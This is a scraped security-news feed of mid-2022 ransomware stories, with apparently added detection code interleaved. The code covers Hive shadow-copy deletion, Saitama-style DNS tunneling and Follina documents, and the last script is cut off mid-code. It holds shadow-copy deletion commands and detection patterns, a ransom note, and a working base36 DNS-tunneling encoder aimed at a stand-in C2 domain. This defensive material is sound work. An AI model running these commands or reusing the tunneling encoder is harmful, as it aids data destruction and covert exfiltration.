What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
Anomali.webp 2022-06-06 21:34:00 Welcome to RSA – How boards and management teams are stopping attackers amidst macro headwinds, the year of great resignation, digital expansion, and escalated cybersecurity activities (direct link) RSA has finally arrived in person. We look forward to seeing our customers, partners, and many others in the broader security ecosystem. At Anomali, we exist to stop attackers, and given the current environment we want to share relevant insight from the ecosystem and the excitement around our delivery of open XDR. In fact, we feel compelled to make it available to test for free. Let's start at the top of the lighthouse, and then distill the best way to navigate the infinite chess game with adversaries, including ransomware and exploits. While doing so, we will also focus on automation, reducing response time and ultimately making security spend more efficient. Boards and management teams are navigating a complex new terrain of macro headwinds (including inflation), geopolitical uncertainty, and escalated cybersecurity activity at a time when digital transformation is paramount and talent scarcity is at an all-time high. What is unequivocal is that management teams must keep their focus on the efficacy of their security posture and, in tandem, optimize cost and efficiency. More than ever, management teams need relevant business insight to swiftly protect themselves and their stakeholders from cyber-attacks. That is our obsession at Anomali: our open XDR solution helps management teams amplify visibility, enrich it with relevant context and, in turn, stop attackers and predict their next move. We deliver unique use cases, starting with a proprietary attack surface management report produced after ingesting all relevant telemetry, including cloud platforms, and correlating hundreds of trillions of telemetry events against cyber threats per second.
In tandem, we are automating processes, reducing response time and optimizing security spend across the environment. The advent of the cloud, digital transformation at large, and the dynamics of a remote workforce have collectively expanded organizations' attack surface to new levels. Today's attack surface comprises all the entry points through which unauthorized access to digital assets could occur. These assets can be externally facing, such as a web application server or an API server, or inadvertently exposed due to a misconfigured firewall, such as a network storage device. According to Gartner, External Attack Surface Management (EASM) is an emerging cybersecurity discipline that identifies and manages the risks presented by internet-facing assets and systems; EASM refers to the processes and technology necessary to discover external-facing assets and effectively manage their vulnerabilities. Anomali XDR identifies your attack surface and your most highly targeted assets. With proprietary big data technology, you can ingest all security telemetry (SIEM, EDR, NDR and public clouds) and distill what is relevant by correlating it with the largest repository of global intelligence, delivering actionable insight across your entire security environment. Our XDR solution provides continuous detection of exposed assets and identifies threat actors that are attempting to breach them. It also identifies assets that need urgent patches or other remediation for known vulnerabilities, adding insight into the criticality of each exposed asset. The following is a summary of recent attack scenarios and how the Anomali Platform has been used to quickly and efficiently detect and block adversaries. Before we start, let us summarize the initial reconnaissance questions we have developed with CIOs, CISOs and their teams. Do you know your organization's attack surface?
Even more importantly, which assets in your organization are highly targeted, and who are the actors behind these targeted attacks? Can you continuously monitor the ever-changing landscape of actors and proactively block them? Are you constantly trying to reduce your attack surface? Are you able to quickly take prioritized act Ransomware Vulnerability Threat Patching
bleepingcomputer.webp 2022-06-06 17:01:20 QBot now pushes Black Basta ransomware in bot-powered attacks (direct link) The Black Basta ransomware gang has partnered with the QBot malware operation to spread laterally through hacked corporate environments. [...] Ransomware Malware
bleepingcomputer.webp 2022-06-06 15:54:02 Mandiant: "No evidence" we were hacked by LockBit ransomware (direct link) American cybersecurity firm Mandiant is investigating the LockBit ransomware gang's claims that they hacked the company's network and stole data. [...] Ransomware
bleepingcomputer.webp 2022-06-06 12:56:10 Ransomware gangs now give victims time to save their reputation (direct link) Threat analysts have observed an unusual trend in ransomware group tactics, reporting that the initial phases of victim extortion are becoming less public, as the actors tend to use hidden or anonymous entries. [...] Ransomware Threat
SecurityWeek.webp 2022-06-06 11:09:01 Feature: Beating Ransomware With Advanced Backup and Data Defense Technologies (direct link) Ransomware
SecurityWeek.webp 2022-06-06 11:02:40 Beating Ransomware With Advanced Backup and Data Defense Technologies (direct link) Question: if we can mitigate file-encryption ransomware with backups, can we mitigate double extortion by adding advanced PII protection through data encryption or tokenization? Ransomware
Trend.webp 2022-06-06 00:00:00 Closing the Door: DeadBolt Ransomware Locks Out Vendors With Multitiered Extortion Scheme (direct link) In this report, we investigate the reasons that the DeadBolt ransomware family is more problematic for its victims than other ransomware families that previously targeted NAS devices. Ransomware
SecurityWeek.webp 2022-06-03 18:02:33 Foxconn Confirms Ransomware Hit Factory in Mexico (direct link) Electronics manufacturing giant Foxconn has confirmed that its Tijuana-based Foxconn Baja California factory was hit by ransomware in late May. Specialized in consumer electronics, industrial operations, and medical devices, the facility employs roughly 5,000 people. Ransomware
MalwarebytesLabs.webp 2022-06-03 16:54:10 Ransomware: May 2022 review (direct link) May 2022 saw the continued dominance of LockBit, and a possible dispersal of the Conti gang into other ransomware groups. Ransomware
bleepingcomputer.webp 2022-06-03 16:41:26 The Week in Ransomware - June 3rd 2022 - Evading sanctions (direct link) Ransomware gangs continue to evolve their operations as victims refuse to pay ransoms due to sanctions or other reasons. [...] Ransomware
Cybereason.webp 2022-06-03 13:10:32 Webinar June 30th 2022: Live Attack Simulation - Ransomware Threat Hunter Series (direct link) Ransomware Threat
News.webp 2022-06-03 11:03:13 Healthcare organizations face rising ransomware attacks – and are paying up (direct link) Via their insurance companies, natch. Healthcare organizations, already an attractive target for ransomware given the highly sensitive data they hold, saw such attacks almost double between 2020 and 2021, according to a survey released this week by Sophos.… Ransomware
Fortinet.webp 2022-06-03 09:37:18 Ransomware Roundup - 2022/06/02 (direct link) FortiGuard Labs is aware of a number of new ransomware strains for the week of May 30th, 2022. It is imperative to raise awareness about new ransomware strains, as infections can cause severe damage to organizations. This week's Ransomware Roundup Threat Signal covers Hive ransomware, Bright Black Ransomware and the Karakurt Data Extortion Group, and Fortinet protections against them. What is Hive Ransomware? Hive ransomware is a Ransomware-as-a-Service (RaaS) that was first observed in June 2021. It is highlighted in this Threat Signal because Costa Rica's public health system was reportedly compromised by it. As a RaaS, the Hive operation consists of two types of groups: the ransomware operator (developer) and affiliates. The former develops Hive ransomware, provides support for its affiliates, and operates the ransom payment site as well as a data leak site called "HiveLeaks" on Tor. The latter carry out the actual attacks: they infect victims, exfiltrate data from them, and deploy Hive ransomware onto the compromised machines. An apparent underground forum post recruiting Hive affiliates promised them an 80% cut. The Hive ransomware binary is the main tool deployed to the compromised machine to encrypt files. Before file encryption takes place, data is stolen from the victim and shadow copies are deleted, which makes file recovery very difficult. Files encrypted by Hive ransomware typically have a .hive extension; other reported file extensions include .aumcc, .sncip, .accuj and .qxycv.
According to a report published by Group-IB, "the data encryption is often carried out during non-working hours or at the weekend" in an attempt to encrypt as many files as possible without being noticed. A typical ransom note left behind by Hive ransomware reads: Your network has been breached and all data is encrypted. To decrypt all the data you will need to purchase our decryption software. Please contact our sales department at: xxxx://[removed].onion/ Login: [removed] Password: [removed] Follow the guidelines below to avoid losing your data: - Do not shutdown or reboot your computers, unmount external storages. - Do not try to decrypt data using third party software. It may cause irreversible damage. - Don't fool yourself. Encryption has perfect secrecy and it's impossible to decrypt without knowing the key. - Do not modify, rename or delete *.key.hive files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to authorities. The negotiation process will be terminated immediately and the key will be erased. - Do not reject to purchase. Your sensitive data will be publicly disclosed at xxxx://[removed]onion/ The group employs a double extortion technique in which victims are asked to make a ransom payment both to recover encrypted files and to prevent the stolen data from being published to "HiveLeaks". Some victims reportedly received phone calls from Hive threat actors. The victim receives a decryption tool upon completion of payment; however, there is chatter suggesting that the decryption tool did not work as advertised in some cases and made virtual machines unbootable because it corrupted the MBR (Master Boot Record). Initial attack vectors include phishing emails with malicious attachments, attacks on vulnerable RDP servers, and the use of compromised VPN credentials.
Purchasing network access from initial access brokers is a possibility as well. Hive ransomware has reportedly victimized companies across a wide range of industries, such as (but not restricted to) real estate, IT and manufacturing. Some RaaS operations have a policy of excluding governmental, educational and military organizations, health care, and critical infrastructure such as gas pipelines and power plants. Hive does not appear to have such a policy, as its victims include health care and government organizations. In August 2021, the Federal Bureau of Investigation (FBI) released a flash alert on Hive ransomware. See the Appendix for Ransomware Malware Tool Threat
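Two of the precursors described in the Hive write-up above, shadow-copy deletion before encryption and a burst of renames to the listed extensions, often outside working hours, are easy to turn into detection logic. The following is an added example, not FortiGuard code: it runs over constructed Windows process-creation and file-rename records in an assumed dict format, and the working-hours definition, host names and paths are assumptions.

```python
"""Detect two Hive-style precursors in endpoint telemetry.

Added example (not FortiGuard's code). Input records are assumed to be dicts
of the form {"ts": ISO-8601, "host": str, "type": "process"|"rename", ...}.
"""
import re
from collections import defaultdict
from datetime import datetime

# Command lines that remove Volume Shadow Copies ahead of encryption.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I),
    re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\s+shadowstorage\b", re.I),
    re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b", re.I),
    re.compile(r"win32_shadowcopy.*\.delete\(", re.I),
]
# Extensions the write-up reports for Hive-encrypted files.
HIVE_EXTENSIONS = (".hive", ".aumcc", ".sncip", ".accuj", ".qxycv")


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def off_hours(dt: datetime) -> bool:
    """Assumption: working hours are Monday-Friday, 07:00-19:00 local time."""
    return dt.weekday() >= 5 or not 7 <= dt.hour < 19


def shadow_copy_deletions(events):
    """Return (ts, host, cmdline) for every shadow-copy deletion command seen."""
    hits = []
    for ev in events:
        if ev.get("type") != "process":
            continue
        cmd = ev.get("cmdline", "")
        if any(p.search(cmd) for p in SHADOW_DELETE_PATTERNS):
            hits.append((ev["ts"], ev["host"], cmd))
    return hits


def encryption_bursts(events, window_minutes=5, min_renames=20):
    """Per host, count renames to Hive extensions inside fixed time windows.

    Returns {host: {"count", "window_start", "off_hours"}} for the busiest
    window on each host that reaches min_renames.
    """
    buckets = defaultdict(list)
    for ev in events:
        if ev.get("type") != "rename":
            continue
        if not ev.get("path", "").lower().endswith(HIVE_EXTENSIONS):
            continue
        dt = parse_ts(ev["ts"])
        start = dt.replace(minute=dt.minute - dt.minute % window_minutes, second=0)
        buckets[(ev["host"], start)].append(dt)
    findings = {}
    for (host, start), times in buckets.items():
        if len(times) >= min_renames and len(times) > findings.get(host, {}).get("count", 0):
            findings[host] = {"count": len(times), "window_start": start.isoformat(),
                              "off_hours": off_hours(start)}
    return findings


# Constructed sample: benign Friday activity on WS07, then a Saturday 02:13
# shadow-copy wipe followed by 25 renames to .hive on file server FS01.
SAMPLE_EVENTS = [
    {"ts": "2022-05-27T10:02:11", "host": "WS07", "type": "process",
     "cmdline": "C:\\Windows\\System32\\notepad.exe C:\\Users\\a\\notes.txt"},
    {"ts": "2022-05-27T10:05:40", "host": "WS07", "type": "rename",
     "path": "C:\\Users\\a\\report-final.docx"},
    {"ts": "2022-05-28T02:13:05", "host": "FS01", "type": "process",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2022-05-28T02:13:06", "host": "FS01", "type": "process",
     "cmdline": "wmic.exe shadowcopy delete"},
] + [
    {"ts": f"2022-05-28T02:14:{i:02d}", "host": "FS01", "type": "rename",
     "path": f"C:\\Share\\Finance\\ledger-{i:03d}.xlsx.hive"}
    for i in range(25)
]

if __name__ == "__main__":
    for hit in shadow_copy_deletions(SAMPLE_EVENTS):
        print("shadow copies deleted:", hit)
    for host, info in encryption_bursts(SAMPLE_EVENTS).items():
        print("rename burst:", host, info)
```

The two signals are deliberately kept separate: a shadow-copy deletion on its own is a high-confidence alert that should fire before any rename is seen, while the rename burst confirms encryption is already under way and tells the responder which host to isolate first.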
cybersecurityventures.webp 2022-06-02 18:41:37 Global Ransomware Damage Costs Predicted To Exceed $265 Billion By 2031 (direct link) Fastest growing type of cybercrime is expected to attack a business, consumer, or device every 2 seconds by 2031 Press Release – David Braue Melbourne, Australia – Jun. 3, 2021 A 2017 report from Cybersecurity Ventures predicted ransomware damages would cost the world $5 billion Ransomware
SecurityAffairs.webp 2022-06-02 18:34:36 LockBit ransomware attack impacted production in a Mexican Foxconn plant (direct link) The LockBit ransomware gang claimed responsibility for an attack against the electronics manufacturing giant Foxconn that impacted production in Mexico. Foxconn confirmed that its production plant in Tijuana (Mexico) was impacted by a ransomware attack in late May. The LockBit ransomware gang claimed responsibility for the attack and announced that it […] Ransomware
SecurityAffairs.webp 2022-06-02 17:09:12 Conti leaked chats confirm the gang's ability to conduct firmware-based attacks (direct link) Analysis of the internal chats of the Conti ransomware group revealed that the gang was working on firmware attack techniques. The analysis of the Conti group's chats, which were leaked earlier this year, revealed that the ransomware gang has been working on firmware attack techniques. An attack against firmware could give threat actors significant powers; they are hard to […] Ransomware Threat
bleepingcomputer.webp 2022-06-02 16:35:29 Evil Corp switches to LockBit ransomware to evade sanctions (direct link) The Evil Corp cybercrime group has now switched to deploying LockBit ransomware on targets' networks to evade sanctions imposed by the U.S. Treasury Department's Office of Foreign Assets Control (OFAC). [...] Ransomware
bleepingcomputer.webp 2022-06-02 15:01:51 Ransomware gang now hacks corporate websites to show ransom notes (direct link) A ransomware gang is taking extortion to a new level by hacking corporate websites to publicly display ransom notes. [...] Ransomware Hack
no_ico.webp 2022-06-02 13:09:11 Costa Rica Public Health Service Ransomware Attack (direct link) Costa Rica's public health service, known as the Costa Rican Social Security Fund (CCSS), has been forced to take its systems offline after being hit by Hive ransomware. Ransomware
Kaspersky.webp 2022-06-02 13:08:55 Cybercriminals Expand Attack Radius and Ransomware Pain Points (direct link) Melissa Bischoping, security researcher with Tanium and Infosec Insiders columnist, urges firms to consider the upstream and downstream impact of "triple extortion" ransomware attacks. Ransomware
DarkReading.webp 2022-06-02 13:00:02 Neutralizing Novel Trickbot Attacks With AI (direct link) Artificial intelligence technology can detect the latest wave of Trickbot ransomware and block the attack before it causes damage. Ransomware
securityintelligence.webp 2022-06-02 13:00:00 Recovering Ransom Payments: Is This the End of Ransomware? (direct link) What's the best way to stop ransomware? Make it riskier and less lucrative for cyber criminals. Nearly all intruders prefer to collect a ransom in cryptocurrency. But it's a double-edged sword, since even crypto leaves a money trail. Recovering ransomware payouts could lead to a sharp decline in exploits. Ransomware is still today's top attack […] Ransomware Guideline
no_ico.webp 2022-06-02 12:57:58 Healthcare Pays More Ransom Demands, But Gets Less Data Back (direct link) According to a new Sophos report, The State of Ransomware in Healthcare 2022, twice as many healthcare organizations paid the ransom in 2021 as in 2020. Though they paid the ransom, only 2% got all of their data back. Interviews with 381 IT professionals in 31 countries revealed the following: ransomware attacks on healthcare almost doubled – […] Ransomware
SecurityWeek.webp 2022-06-02 12:52:06 Leaks Show Conti Ransomware Group Working on Firmware Exploits (direct link) The recent Conti leaks show that the notorious ransomware group has been working on firmware exploits targeting the Intel Management Engine (ME) system. Ransomware
no_ico.webp 2022-06-02 11:23:59 Why Did the Ransomware Timeline Shrink by 94%? (direct link) Researchers at IBM's X-Force team are reporting a 94% reduction in the duration of an enterprise ransomware attack from 2019 to 2021. Though the overall time was reduced, the attackers' tools appeared to remain mostly the same. Research showed that ransomware operators were most efficient against enterprises "who have not implemented effective measures to combat […] Ransomware Tool
SecurityWeek.webp 2022-06-02 10:45:08 Access Brokers and Ransomware-as-a-Service Gangs Tighten Relationships (direct link) Access brokers sell compromised network access to help ransomware gangs launch attacks Ransomware
bleepingcomputer.webp 2022-06-02 09:22:31 Conti ransomware targeted Intel firmware for stealthy attacks (direct link) Researchers analyzing the leaked chats of the notorious Conti ransomware operation have discovered that teams inside the Russian cybercrime group were actively developing firmware hacks. [...] Ransomware
CSO.webp 2022-06-02 08:04:00 Cybercriminals look to exploit Intel ME vulnerabilities for highly persistent implants (direct link) Leaked internal chats from the Conti ransomware gang suggest the group has been researching and developing code to compromise the Intel Management Engine (Intel ME), the out-of-band management functionality built into Intel chipsets. The goal of this technique is to install malicious code deep inside computer firmware, where it cannot be blocked by operating systems and third-party endpoint security products. Firmware implants are powerful and are usually used in high-value operations by state-sponsored hacker groups. However, over the past couple of years cybercriminal gangs have also shown an interest, with the developers of the notorious TrickBot botnet adding a UEFI attack module in 2020. According to new research by security firm Eclypsium, the Conti ransomware group developed proof-of-concept code to exploit Intel ME firmware and gain code execution in System Management Mode, a highly privileged execution environment of the CPU. Ransomware
Mandiant.webp 2022-06-02 06:00:00 To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions (direct link) The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) Ransomware Malware
The_Hackers_News.webp 2022-06-02 05:13:36 Conti Leaks Reveal Ransomware Gang's Interest in Firmware-based Attacks (direct link) An analysis of leaked chats from the notorious Conti ransomware group earlier this year has revealed that the syndicate has been working on a set of firmware attack techniques that could offer a path to accessing privileged code on compromised devices. "Control over firmware gives attackers virtually unmatched powers both to directly cause damage and to enable other long-term strategic goals," Ransomware
bleepingcomputer.webp 2022-06-02 04:20:27 Foxconn confirms ransomware attack disrupted production in Mexico (direct link) Electronics manufacturer Foxconn has confirmed that one of its Mexico-based production plants was impacted by a ransomware attack in late May. [...] Ransomware
The_Hackers_News.webp 2022-06-02 04:01:03 Researchers Demonstrate Ransomware for IoT Devices That Targets IT and OT Networks (direct link) As ransomware infections have evolved from purely encrypting data to schemes such as double and triple extortion, a new attack vector is likely to set the stage for future campaigns. Called Ransomware for IoT or R4IoT by Forescout, it's a "novel, proof-of-concept ransomware that exploits an IoT device to gain access and move laterally in an IT [information technology] network and impact the OT [ Ransomware
CSO.webp 2022-06-02 02:00:00 Ransomware roundup: System-locking malware dominates headlines (direct link) As we head into the unofficial start of summer, it does not appear the criminal groups that run ransomware schemes are planning to take any time to rest. Ransomware was all over the infosec news headlines in the past week, with one new report revealing that its presence has grown more in the last year than in the past several years combined. Here's a roundup of noteworthy ransomware stories you might have missed. DBIR finds ransomware increased by double digits: Verizon Business' annual Data Breach Investigations Report (DBIR) is out and confirms what many CISOs already know: ransomware continues to plague business. Ransomware-related breach instances rose 13%, an increase larger than in the past 5 years combined. Ransomware Data Breach Malware
MalwarebytesLabs.webp 2022-06-02 00:12:10 Ransomware attack turns 2022 into 1977 for Somerset County (direct link) Somerset County in New Jersey has been sent back to 1977 after a ransomware attack shut down various historical record checks. Ransomware
Trend.webp 2022-06-02 00:00:00 YourCyanide: A CMD-based Ransomware With Multiple Layers of Obfuscation (direct link) The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number of capabilities, such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives. Ransomware Threat
knowbe4.webp 2022-06-01 22:08:53 The Business (and Success) of Ransomware Explained as a Simple Funnel (direct link) Ransomware
Anomali.webp 2022-06-01 17:47:00 Anomali Cyber Watch: TURLA's New Phishing-Based Reconnaissance Campaign in Eastern Europe, Unknown APT Group Has Targeted Russia Repeatedly Since Ukraine Invasion and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chromeloader, Goodwill, MageCart, Saitama, Turla and Yashma. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Credit Card Stealer Targets PsiGate Payment Gateway Software (published: May 25, 2022) Sucuri researchers have detailed their findings on a MageCart skimmer discovered within the Magento payment portal. Embedded within the core_config_data table of Magento's database, the skimmer was obfuscated and encoded with CharCode. Once deobfuscated, a JavaScript credit card stealer was revealed. The stealer is able to capture text and fields submitted to the payment page, including credit card numbers and expiry dates. Once stolen, a synchronous AJAX request is used to exfiltrate the data. Analyst Comment: Harden endpoint security and use firewalls to block suspicious activity to help mitigate skimmer injection. Monitor network traffic to identify anomalous behavior that may indicate C2 activity.
MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Input Capture - T1056 Tags: MageCart, skimmer, JavaScript, Magento, PsiGate, AJAX How the Saitama Backdoor uses DNS Tunneling (published: May 25, 2022) Malwarebytes researchers have released a report detailing how the Saitama backdoor uses DNS tunneling to communicate stealthily with command and control (C2) infrastructure. DNS tunneling is an effective way to hide C2 communication because DNS traffic serves a vital function in modern internet communications, so blocking DNS traffic outright is almost never done. Saitama formats its DNS lookups as a domain name consisting of a message and a counter, followed by the root domain. Data is encoded using a hardcoded base36 alphabet. There are four types of messages that Saitama can send using this method: Make Contact, to establish communication with a C2 domain; Ask For Command, to get the expected size of the payload to be delivered; Get A Command, in which Saitama makes Receive requests to retrieve payloads and instructions; and finally Run The Command, in which Saitama runs the instructions or executes the payload and sends the results to the established C2. Analyst Comment: Implement an effective DNS filtering system to block malicious queries. Furthermore, maintaining a whitelist of allowed applications for installation will assist in preventing malware like Saitama from being installed. MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: C2, DNS, Saitama, backdoor, base36, DNS tunneling Ransomware Malware Tool Threat APT 19
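The query structure described above, as an added example that is neither Malwarebytes' analysis code nor the malware's own: the implant side builds names of the form message, then counter, then root domain, the C2 side recovers them, and a detector flags root domains that receive many distinct, long, base36-looking first labels. The alphabet, the three-symbol counter width, the hypothetical root domain c2.example and the query-log format are assumptions, not values taken from Saitama.

```python
"""Message-plus-counter DNS queries and a query-log detector for them.

Added example, not Malwarebytes' or the malware's code. The alphabet, the
three-symbol counter width, the root domain and the log format are assumed.
"""
import hashlib
import math
import re
from collections import defaultdict

# Shuffled base36 alphabet (assumption: illustrative, not Saitama's real one).
ALPHABET = "razupgnv2w01b8o3s6i4td9lxeqh7m5cykjf"
COUNTER_WIDTH = 3                        # assumption: counter is 3 symbols wide
LABEL_RE = re.compile(r"^[a-z0-9]+$")    # what a base36 label looks like on the wire


def encode_int(n: int) -> str:
    """Base36-encode a non-negative integer with the custom alphabet."""
    if n == 0:
        return ALPHABET[0]
    digits = []
    while n:
        n, r = divmod(n, 36)
        digits.append(ALPHABET[r])
    return "".join(reversed(digits))


def decode_int(s: str) -> int:
    n = 0
    for ch in s:
        n = n * 36 + ALPHABET.index(ch)
    return n


def encode_bytes(data: bytes) -> str:
    # A 0x01 prefix keeps leading zero bytes through the integer round trip.
    return encode_int(int.from_bytes(b"\x01" + data, "big"))


def decode_bytes(s: str) -> bytes:
    n = decode_int(s)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")[1:]


def build_query(message: bytes, counter: int, root: str) -> str:
    """Implant side: '<message><counter>.<root>'; one DNS label is at most 63 chars."""
    ctr = encode_int(counter).rjust(COUNTER_WIDTH, ALPHABET[0])
    assert len(ctr) == COUNTER_WIDTH, "counter overflow"
    label = encode_bytes(message) + ctr
    assert len(label) <= 63, "label too long: chunk the message"
    return f"{label}.{root}"


def parse_query(qname: str, root: str):
    """C2 side: recover (message, counter) from the query name."""
    label = qname[: -len(root) - 1]
    return decode_bytes(label[:-COUNTER_WIDTH]), decode_int(label[-COUNTER_WIDTH:])


def shannon_entropy(text: str) -> float:
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def flag_tunneling(log_lines, min_distinct=8, min_mean_len=12, min_entropy=3.0):
    """Flag root domains whose first labels look like encoded payloads.

    Assumed log format: '<timestamp> <client> <qname>' per line. The root is
    taken as the last two labels (no public-suffix lookup). Returns {root: stats}.
    """
    first_labels = defaultdict(set)
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        labels = parts[2].rstrip(".").lower().split(".")
        if len(labels) >= 3 and LABEL_RE.match(labels[0]):
            first_labels[".".join(labels[-2:])].add(labels[0])
    flagged = {}
    for root, labels in first_labels.items():
        mean_len = sum(map(len, labels)) / len(labels)
        ent = shannon_entropy("".join(labels))
        if len(labels) >= min_distinct and mean_len >= min_mean_len and ent >= min_entropy:
            flagged[root] = {"distinct": len(labels), "mean_len": mean_len, "entropy": ent}
    return flagged


# Constructed sample log: three ordinary lookups, then ten beacons to a
# hypothetical root domain, each carrying an 8-byte chunk and its counter.
C2_ROOT = "c2.example"
SAMPLE_LOG = [
    "2022-05-25T10:00:01Z 10.0.0.5 www.example.com",
    "2022-05-25T10:00:02Z 10.0.0.5 mail.example.com",
    "2022-05-25T10:00:03Z 10.0.0.7 cdn.static-assets.net",
] + [
    "2022-05-25T10:01:%02dZ 10.0.0.9 %s"
    % (i, build_query(hashlib.sha256(b"chunk%d" % i).digest()[:8], i, C2_ROOT))
    for i in range(10)
]

if __name__ == "__main__":
    print(flag_tunneling(SAMPLE_LOG))   # only c2.example should be reported
```

The detector keys on what the encoding forces rather than on any particular alphabet: a tunnel has to emit many unique, high-entropy subdomains under one root, while CDN and mail lookups reuse a handful of short labels. Tune min_distinct against your own resolver logs, since large SaaS tenants legitimately generate many distinct subdomains.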
DarkReading.webp 2022-06-01 16:33:21 Ordr Secures $40 Million in Series C Funding to Answer Increased Demand for Connected Device Security (direct link) Rising threat of data breaches and ransomware attacks drives need for complete and accurate real-time information about devices and their risks. Ransomware Threat
knowbe4.webp 2022-06-01 12:59:33 CyberheistNews Vol 12 #22 [Heads Up] The New Verizon 2022 Data Breach Investigation Report Shows Sharp Rise in Ransomware (direct link) Ransomware Data Breach
SecurityWeek.webp 2022-06-01 11:16:56 Researchers Devise Attack Using IoT and IT to Deliver Ransomware Against OT (direct link) Critical industries must prepare themselves for a new wave of ransomware attacks specifically targeting OT Ransomware
securityintelligence.webp 2022-06-01 10:00:00 Countdown to Ransomware: Analysis of Ransomware Attack Timelines (direct link) This research was made possible through the data collection efforts of Maleesha Perera, Joffrin Alexander, and Alana Quinones Garcia. Key Highlights: The average duration of an enterprise ransomware attack fell 94.34% between 2019 and 2021. 2019: 2+ months — The TrickBot (initial access) to Ryuk (deployment) attack path resulted in a 90% increase in ransomware […] Ransomware
bleepingcomputer.webp 2022-06-01 07:32:43 Ransomware attacks need less than four days to encrypt systems (direct link) The duration of ransomware attacks in 2021 averaged 92.5 hours, measured from initial network access to payload deployment. In 2020, ransomware actors spent an average of 230 hours to complete their attacks, and 1637.6 hours in 2019. [...] Ransomware
SecurityAffairs.webp 2022-06-01 06:53:54 Hive ransomware gang hit Costa Rica public health service (direct link) The Costa Rican Social Security Fund (CCSS), Costa Rica's public health service, was hit today by a Hive ransomware attack, BleepingComputer reported. The attack occurred early this morning, Tuesday, May 31, 2022. The authorities are investigating […] Ransomware
SecurityWeek.webp 2022-06-01 00:30:00 Costa Rica Public Health System Targeted by Ransomware (direct link) Another attempted hacking of a Costa Rican government agency's computer system led the country's public health agency to shut down its systems Tuesday to protect itself, complicating the medical care of thousands of people. Ransomware
MalwarebytesLabs.webp 2022-05-31 20:53:40 Threat profile: RansomHouse makes extortion work without ransomware (direct link) RansomHouse, a new extortion group, distances itself from ransomware. However, it seems to have had ties to ransomware groups in the past. Ransomware
Chercheur.webp 2022-05-31 19:57:58 Costa Rica May Be Pawn in Conti Ransomware Group's Bid to Rebrand, Evade Sanctions (direct link) Costa Rica's national health service was hacked sometime earlier this morning by a Russian ransomware group known as Hive. The intrusion comes just weeks after Costa Rican President Rodrigo Chaves declared a state of emergency in response to a data ransom attack from a different Russian ransomware gang - Conti. Ransomware experts say there is good reason to believe the same cybercriminals are behind both attacks, and that Hive has been helping Conti rebrand and evade international sanctions targeting extortion payouts to cybercriminals operating in Russia. Ransomware
Minerva.webp 2022-05-31 19:57:58 New Microsoft Office "Follina" zero-day Already Shared on Ransomware Forums (direct link) The new zero-day MS Word vulnerability discovered by Nao_Sec on May 27, 2022, dubbed 'Follina' (CVE-2022-30190) and targeting Microsoft Office, is being actively used, Minerva researchers found. The exploit targets a vulnerability in Microsoft's Windows Support Diagnostic Tool (MSDT) that occurs due to the ms-msdt MSProtocol URI scheme, which can load and execute code via PowerShell even with macros disabled. Successful exploitation enables an attacker to execute arbitrary code on the targeted host. However, the attacker must socially engineer the victim into opening a specially crafted file, which requires a targeted effort to succeed, making the vulnerability less attractive to unskilled actors but highly relevant to ransomware gangs such as CONTI, CL0P and ALPHV. To combat this new threat, businesses must focus on threat prevention, an approach in which Minerva excels. Ransomware Tool Vulnerability Threat
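A static triage check for the delivery document described above, as an added example that is not Minerva's or Nao_Sec's code: it inspects an OOXML package for an external oleObject relationship (the mechanism the public Follina lure used to fetch its remote HTML stage) and for any literal ms-msdt: URI inside any part of the package. The sample packages, the relationship ID rId996, the host attacker.invalid and the stage snippet are constructed for illustration.

```python
"""Static triage of an OOXML document for Follina-style remote content loading.

Added example (not Minerva's or Nao_Sec's code). Checks a .docx package for
(a) an external oleObject relationship, the mechanism the public Follina lure
used to pull its remote HTML stage, and (b) any literal 'ms-msdt:' URI in any
part. The sample packages, relationship ID and host below are constructed.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if name.endswith(".rels"):
                try:
                    root = ET.fromstring(blob)
                except ET.ParseError:
                    findings.append(f"{name}: unparseable relationships part")
                    continue
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    # Hyperlinks are normally external; an external OLE object is not.
                    if (rel.get("TargetMode", "").lower() == "external"
                            and rel.get("Type") == OLE_REL):
                        findings.append(f"{name}: external oleObject -> {rel.get('Target')}")
            if MSDT_RE.search(blob):
                findings.append(f"{name}: contains ms-msdt: URI")
    return findings


def make_docx(rels_xml: str, extra_parts=None) -> bytes:
    """Build a minimal OOXML package in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
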